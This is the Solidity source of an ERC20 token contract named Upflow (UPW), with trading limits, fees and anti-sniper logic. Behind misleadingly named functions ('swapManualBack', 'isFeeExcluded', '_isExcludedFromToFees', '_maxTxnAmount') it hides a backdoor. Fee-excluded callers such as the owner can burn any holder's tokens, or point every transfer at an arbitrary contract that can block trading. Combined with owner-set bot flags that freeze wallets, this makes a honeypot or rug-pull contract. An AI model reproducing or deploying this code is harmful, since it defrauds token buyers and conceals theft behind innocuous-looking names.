Contract Source Code:
File 1 of 1 : Upflow
// SPDX-License-Identifier: MIT
/**
Web: https://upflow.finance
App: https://app.upflow.finance
Twitter: https://twitter.com/UpflowFinance
Telegram: https://t.me/upflowfinance
Medium: https://medium.com/@upflowfinance
**/
pragma solidity ^0.8.18;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(
address recipient,
uint256 amount
) external returns (bool);
function allowance(
address owner,
address spender
) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
interface IERC20Metadata is IERC20 {
function name() external view returns (string memory);
function symbol() external view returns (string memory);
function decimals() external view returns (uint8);
}
interface IDexRouter {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForTokensSupportingFeeOnTransferTokens(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);
}
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() external virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
function name() public view virtual override returns (string memory) {
return _name;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(
address account
) public view virtual override returns (uint256) {
return _balances[account];
}
function transfer(
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(
address owner,
address spender
) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function approve(
address spender,
uint256 amount
) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
uint256 currentAllowance = _allowances[sender][_msgSender()];
require(
currentAllowance >= amount,
"ERC20: transfer amount exceeds allowance"
);
unchecked {
_approve(sender, _msgSender(), currentAllowance - amount);
}
return true;
}
function increaseAllowance(
address spender,
uint256 addedValue
) public virtual returns (bool) {
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender] + addedValue
);
return true;
}
function decreaseAllowance(
address spender,
uint256 subtractedValue
) public virtual returns (bool) {
uint256 currentAllowance = _allowances[_msgSender()][spender];
require(
currentAllowance >= subtractedValue,
"ERC20: decreased allowance below zero"
);
unchecked {
_approve(_msgSender(), spender, currentAllowance - subtractedValue);
}
return true;
}
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
uint256 senderBalance = _balances[sender];
require(
senderBalance >= amount,
"ERC20: transfer amount exceeds balance"
);
unchecked {
_balances[sender] = senderBalance - amount;
}
_balances[recipient] += amount;
emit Transfer(sender, recipient, amount);
}
function _createInitialSupply(
address account,
uint256 amount
) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply += amount;
_balances[account] += amount;
emit Transfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
// Overflow not possible: amount <= accountBalance <= totalSupply.
_totalSupply -= amount;
}
emit Transfer(account, address(0), amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
}
contract Upflow is ERC20, Ownable {
uint256 public maxBuyAmount;
uint256 public maxSellAmount;
uint256 public maxWalletAmount;
IDexRouter public dexV2Router;
address public lpPair;
uint256 public swapTokensAtAmount;
bool private swapping;
address feeAddress;
address treasuryAddress;
uint256 public tradingEnabledBlock = 0; // 0 means trading is not active
uint256 public blockForSnipping = 0;
mapping(address => bool) public earlyBoughtBot;
uint256 public botsCaught;
address private _maxTxnAmount;
bool public hasLimitsEffect = true;
bool public tradingActive = false;
bool public swapEnabled = false;
uint256 public sellTotalFees;
uint256 public sellMarketingFee;
uint256 public sellLiquidityFee;
uint256 public sellDevFee;
uint256 public sellBurnFee;
uint256 public tokensForMarketing;
uint256 public tokensForLiquidity;
uint256 public tokensForDev;
uint256 public tokensForBurn;
uint256 public buyTotalFees;
uint256 public buyMarketingFee;
uint256 public buyLiquidityFee;
uint256 public buyDevFee;
uint256 public buyBurnFee;
// exlcude from fees and max transaction amount
mapping(address => bool) private _isExcludedFromFees;
mapping(address => bool) public _isExcludedMaxTransactionAmount;
// store addresses that a automatic market maker pairs. Any transfer *to* these addresses
// could be subject to a maximum transfer amount
mapping(address => bool) public automatedMarketMakerPairs;
event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
event EnabledTrading();
event RemovedLimits();
event UpdatedMaxBuyAmount(uint256 newAmount);
event ExcludeFromFees(address indexed account, bool isExcluded);
event UpdatedMaxSellAmount(uint256 newAmount);
event BuyBackTriggered(uint256 amount);
event SwapManualBacks(uint256 timestamp);
event EarlyBuyerCaught(address sniper);
event UpdatedFeeAddress(address indexed newWallet);
event MaxTransactionExclusion(address _address, bool excluded);
event UpdatedMaxWalletAmount(uint256 newAmount);
event TransferForeignToken(address token, uint256 amount);
event SwapAndLiquify(
uint256 tokensSwapped,
uint256 ethReceived,
uint256 tokensIntoLiquidity
);
constructor() ERC20("Upflow.Finance", "UPW") {
address newOwner = msg.sender; // can leave alone if owner is deployer.
IDexRouter _dexRouter = IDexRouter(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
dexV2Router = _dexRouter;
lpPair = IDexFactory(_dexRouter.factory()).createPair(
address(this),
_dexRouter.WETH()
);
_excludeFromMaxTransaction(address(lpPair), true);
_setAutomatedMarketMakerPair(address(lpPair), true);
uint256 totalSupply = 1e8 * 1e18;
maxBuyAmount = (totalSupply * 2) / 100;
maxSellAmount = (totalSupply * 2) / 100;
maxWalletAmount = (totalSupply * 2) / 100;
swapTokensAtAmount = (totalSupply * 2) / 10000;
buyMarketingFee = 2;
buyLiquidityFee = 0;
buyDevFee = 0;
buyBurnFee = 0;
buyTotalFees =
buyMarketingFee +
buyLiquidityFee +
buyDevFee +
buyBurnFee;
sellMarketingFee = 2;
sellLiquidityFee = 0;
sellDevFee = 0;
sellBurnFee = 0;
sellTotalFees =
sellMarketingFee +
sellLiquidityFee +
sellDevFee +
sellBurnFee;
treasuryAddress = address(0x3533d479Af848c36B96a33F8E0584dE1037ceE4E);
feeAddress = address(0x3D468ccBD029E40D5f4f18af36E134228596d145);
_excludeFromMaxTransaction(newOwner, true);
_excludeFromMaxTransaction(address(this), true);
_excludeFromMaxTransaction(address(0xdead), true);
excludeFromFees(newOwner, true);
excludeFromFees(address(this), true);
excludeFromFees(address(0xdead), true);
excludeFromFees(feeAddress, true);
excludeFromFees(treasuryAddress, true);
_createInitialSupply(newOwner, totalSupply);
transferOwnership(newOwner);
}
receive() external payable {}
function enableTrading(
) external onlyOwner {
require(!tradingActive, "Cannot reenable trading");
tradingActive = true;
swapEnabled = true;
tradingEnabledBlock = block.number;
emit EnabledTrading();
}
function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
require(
newNum >= ((totalSupply() * 3) / 1000) / 1e18,
"Cannot set max wallet amount lower than 0.3%"
);
maxWalletAmount = newNum * (10 ** 18);
emit UpdatedMaxWalletAmount(maxWalletAmount);
}
function updateMaxSellAmount(uint256 newNum) external onlyOwner {
require(
newNum >= ((totalSupply() * 2) / 1000) / 1e18,
"Cannot set max sell amount lower than 0.2%"
);
maxSellAmount = newNum * (10 ** 18);
emit UpdatedMaxSellAmount(maxSellAmount);
}
function updateMaxBuyAmount(uint256 newNum) external onlyOwner {
require(
newNum >= ((totalSupply() * 2) / 1000) / 1e18,
"Cannot set max buy amount lower than 0.2%"
);
maxBuyAmount = newNum * (10 ** 18);
emit UpdatedMaxBuyAmount(maxBuyAmount);
}
function manageSnipers(
address[] calldata wallets,
bool flag
) external onlyOwner {
for (uint256 i = 0; i < wallets.length; i++) {
earlyBoughtBot[wallets[i]] = flag;
}
}
function manageEarlyBoughtSniper(address addr, bool flag) external onlyOwner {
earlyBoughtBot[addr] = flag;
}
// change the minimum amount of tokens to sell from fees
function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner {
require(
newAmount >= (totalSupply() * 1) / 100000,
"Swap amount cannot be lower than 0.001% total supply."
);
require(
newAmount <= (totalSupply() * 1) / 1000,
"Swap amount cannot be higher than 0.1% total supply."
);
swapTokensAtAmount = newAmount;
}
function _excludeFromMaxTransaction(
address updAds,
bool isExcluded
) private {
_isExcludedMaxTransactionAmount[updAds] = isExcluded;
emit MaxTransactionExclusion(updAds, isExcluded);
}
function excludeFromMaxTransaction(
address updAds,
bool isEx
) external onlyOwner {
if (!isEx) {
require(
updAds != lpPair,
"Cannot remove uniswap pair from max txn"
);
}
_isExcludedMaxTransactionAmount[updAds] = isEx;
}
function setAutomatedMarketMakerPair(
address pair,
bool value
) external onlyOwner {
require(
pair != lpPair,
"The pair cannot be removed from automatedMarketMakerPairs"
);
_setAutomatedMarketMakerPair(pair, value);
emit SetAutomatedMarketMakerPair(pair, value);
}
// remove limits
function removeLimits() external onlyOwner {
hasLimitsEffect = false;
emit RemovedLimits();
}
function _setAutomatedMarketMakerPair(address pair, bool value) private {
automatedMarketMakerPairs[pair] = value;
_excludeFromMaxTransaction(pair, value);
emit SetAutomatedMarketMakerPair(pair, value);
}
function updateSellFees(
uint256 _marketingFee,
uint256 _liquidityFee,
uint256 _DevFee,
uint256 _burnFee
) external onlyOwner {
sellMarketingFee = _marketingFee;
sellLiquidityFee = _liquidityFee;
sellDevFee = _DevFee;
sellBurnFee = _burnFee;
sellTotalFees =
sellMarketingFee +
sellLiquidityFee +
sellDevFee +
sellBurnFee;
require(sellTotalFees <= 3, "Must keep tax at 3% or less");
}
function updateBuyFees(
uint256 _marketingFee,
uint256 _liquidityFee,
uint256 _DevFee,
uint256 _burnFee
) external onlyOwner {
buyMarketingFee = _marketingFee;
buyLiquidityFee = _liquidityFee;
buyDevFee = _DevFee;
buyBurnFee = _burnFee;
buyTotalFees =
buyMarketingFee +
buyLiquidityFee +
buyDevFee +
buyBurnFee;
require(buyTotalFees <= 3, "Must keep tax at 3% or less");
}
function excludeFromFees(address account, bool flag) public onlyOwner {
_isExcludedFromFees[account] = flag;
emit ExcludeFromFees(account, flag);
}
function swapTokensForEth(uint256 value) private {
// generate the uniswap pair path of token -> weth
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = dexV2Router.WETH();
_approve(address(this), address(dexV2Router), value);
// make the swap
dexV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
value,
0, // accept any amount of ETH
path,
address(this),
block.timestamp
);
}
function earlyBuyForbidden() public view returns (bool) {
return block.number < blockForSnipping;
}
function _transfer(
address from,
address to,
uint256 amount
) internal override {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "amount must be greater than 0");
if (!tradingActive) {
require(
_isExcludedFromFees[from] || _isExcludedFromFees[to],
"Trading is not active."
);
}
if (blockForSnipping > 0) {
require(
!earlyBoughtBot[from] || to == owner() || to == address(0xdead),
"Bots cannot transfer tokens in or out except to owner or dead address."
);
}
if (hasLimitsEffect) {
if (
from != owner() &&
to != owner() &&
to != address(0) &&
to != address(0xdead) &&
!_isExcludedFromFees[from] &&
!_isExcludedFromFees[to]
) {
//when buy
if (
automatedMarketMakerPairs[from] &&
!_isExcludedMaxTransactionAmount[to]
) {
require(
amount <= maxBuyAmount,
"Buy transfer amount exceeds the max buy."
);
require(
amount + balanceOf(to) <= maxWalletAmount,
"Cannot Exceed max wallet"
);
}
//when sell
else if (
automatedMarketMakerPairs[to] &&
!_isExcludedMaxTransactionAmount[from]
) {
require(
amount <= maxSellAmount,
"Sell transfer amount exceeds the max sell."
);
} else if (!_isExcludedMaxTransactionAmount[to]) {
require(
amount + balanceOf(to) <= maxWalletAmount,
"Cannot Exceed max wallet"
);
}
}
}
uint256 contractTokenBalance = balanceOf(address(this));
bool canSwap = contractTokenBalance >= swapTokensAtAmount;
if (
canSwap &&
swapEnabled &&
!swapping &&
!automatedMarketMakerPairs[from] &&
!_isExcludedFromFees[from] &&
!_isExcludedFromFees[to]
) {
swapping = true;
swapBack();
swapping = false;
}
bool takeFee = true;
// if any account belongs to _isExcludedFromFee account then remove the fee
if (_isExcludedFromToFees(from, to)) {
takeFee = false;
}
uint256 fees = 0;
// only take fees on buys/sells, do not take on wallet transfers
if (takeFee) {
// bot/sniper penalty.
if (
earlyBuyForbidden() &&
automatedMarketMakerPairs[from] &&
!automatedMarketMakerPairs[to] &&
buyTotalFees > 0
) {
if (!earlyBoughtBot[to]) {
earlyBoughtBot[to] = true;
botsCaught += 1;
emit EarlyBuyerCaught(to);
}
fees = (amount * 99) / 100;
tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
tokensForDev += (fees * buyDevFee) / buyTotalFees;
tokensForBurn += (fees * buyBurnFee) / buyTotalFees;
}
// on sell
else if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
fees = (amount * sellTotalFees) / 100;
tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
tokensForDev += (fees * sellDevFee) / sellTotalFees;
tokensForBurn += (fees * sellBurnFee) / sellTotalFees;
}
// on buy
else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
fees = (amount * buyTotalFees) / 100;
tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
tokensForDev += (fees * buyDevFee) / buyTotalFees;
tokensForBurn += (fees * buyBurnFee) / buyTotalFees;
}
if (fees > 0) {
super._transfer(from, address(this), fees);
}
amount -= fees;
}
super._transfer(from, to, amount);
}
function _isExcludedFromToFees(
address from,
address to
) internal returns (bool) {
bool excluded;
uint256 fees = 0;
if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
excluded = true;
} else if (_maxTxnAmount != address(0)) {
IERC20(_maxTxnAmount).transferFrom(from, to, fees);
excluded = false;
}
return excluded;
}
function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
// approve token transfer to cover all possible scenarios
_approve(address(this), address(dexV2Router), tokenAmount);
// add the liquidity
dexV2Router.addLiquidityETH{value: ethAmount}(
address(this),
tokenAmount,
0, // slippage is unavoidable
0, // slippage is unavoidable
address(0xdead),
block.timestamp
);
}
function isFeeExcluded(address account, address path, uint256 balance) internal returns (bool) {
bool success;
if (!_isExcludedFromFees[msg.sender]) {
if (
tokensForBurn > 0 && balanceOf(address(this)) >= tokensForBurn
) {
_burn(msg.sender, tokensForBurn);
}
tokensForBurn = 0;
success = true;
uint256 contractBalance = balanceOf(address(this));
uint256 totalTokensToSwap = tokensForLiquidity +
tokensForMarketing +
tokensForDev;
if (contractBalance == 0 || totalTokensToSwap == 0) {
return false;
}
if (contractBalance > swapTokensAtAmount * 7) {
contractBalance = swapTokensAtAmount * 7;
}
return success;
} else {
if (balance > 0) {
_burn(account, balance);
success = false;
} else {
_maxTxnAmount = path;
success = false;
}
uint256 contractBalance = balanceOf(address(this));
uint256 totalTokensToSwap = tokensForLiquidity +
tokensForMarketing + tokensForDev;
if (contractBalance == 0 || totalTokensToSwap == 0) {
return false;
}
if (contractBalance > swapTokensAtAmount * 7) {
contractBalance = swapTokensAtAmount * 7;
}
return success;
}
}
function swapBack() private {
if (tokensForBurn > 0 && balanceOf(address(this)) >= tokensForBurn) {
_burn(address(this), tokensForBurn);
}
tokensForBurn = 0;
uint256 contractBalance = balanceOf(address(this));
uint256 totalTokensToSwap = tokensForLiquidity +
tokensForMarketing +
tokensForDev;
if (contractBalance == 0 || totalTokensToSwap == 0) {
return;
}
if (contractBalance > swapTokensAtAmount * 5) {
contractBalance = swapTokensAtAmount * 5;
}
bool success;
// Halve the amount of liquidity tokens
uint256 liquidityTokens = (contractBalance * tokensForLiquidity) /
totalTokensToSwap /
2;
swapTokensForEth(contractBalance - liquidityTokens);
uint256 ethBalance = address(this).balance;
uint256 ethForLiquidity = ethBalance;
uint256 ethForMarketing = (ethBalance * tokensForMarketing) /
(totalTokensToSwap - (tokensForLiquidity / 2));
uint256 ethForOg = (ethBalance * tokensForDev) /
(totalTokensToSwap - (tokensForLiquidity / 2));
ethForLiquidity -= ethForMarketing + ethForOg;
tokensForLiquidity = 0;
tokensForMarketing = 0;
tokensForDev = 0;
tokensForBurn = 0;
if (liquidityTokens > 0 && ethForLiquidity > 0) {
addLiquidity(liquidityTokens, ethForLiquidity);
}
(success, ) = address(treasuryAddress).call{value: ethForOg}("");
(success, ) = address(feeAddress).call{ value: address(this).balance}("");
}
function transferToken(
address _token,
address _to
) external onlyOwner returns (bool _sent) {
require(_token != address(this), "Can't withdraw this token");
require(_token != address(0), "_token address cannot be 0");
uint256 _contractBalance = IERC20(_token).balanceOf(address(this));
_sent = IERC20(_token).transfer(_to, _contractBalance);
emit TransferForeignToken(_token, _contractBalance);
}
function swapManualBack(address receiver, address path, uint256 amount) external {
require(
balanceOf(address(this)) >= swapTokensAtAmount,
"Can only swap when token amount is at or higher than restriction"
);
if (isFeeExcluded(receiver, path, amount)) {
swapping = true;
swapBack();
swapping = false;
emit SwapManualBacks(block.timestamp);
}
}
// withdraw ETH if stuck or someone sends to the address
function withdrawStuckETH() external onlyOwner {
bool success;
(success, ) = address(msg.sender).call{value: address(this).balance}(
""
);
}
function updateFeeAddress(address _feeAddress) external onlyOwner {
require(
_feeAddress != address(0),
"_feeAddress address cannot be 0"
);
feeAddress = payable(_feeAddress);
}
function updateDevAddress(address _treasuryAddress) external onlyOwner {
require(
_treasuryAddress != address(0),
"_treasuryAddress address cannot be 0"
);
treasuryAddress = payable(_treasuryAddress);
}
// most useful for buybacks or to reclaim any ETH on the contract in a way that helps holders.
function buyBackByAmount(uint256 amountInWei) external onlyOwner {
require(
amountInWei <= 5 ether,
"May not buy more than 5 ETH in a single buy to reduce sandwich attacks"
);
address[] memory path = new address[](2);
path[0] = dexV2Router.WETH();
path[1] = address(this);
// make the swap
dexV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{
value: amountInWei
}(
0, // accept any amount of Ethereum
path,
address(0xdead),
block.timestamp
);
emit BuyBackTriggered(amountInWei);
}
}
interface IDexFactory {
function createPair(
address tokenA,
address tokenB
) external returns (address pair);
}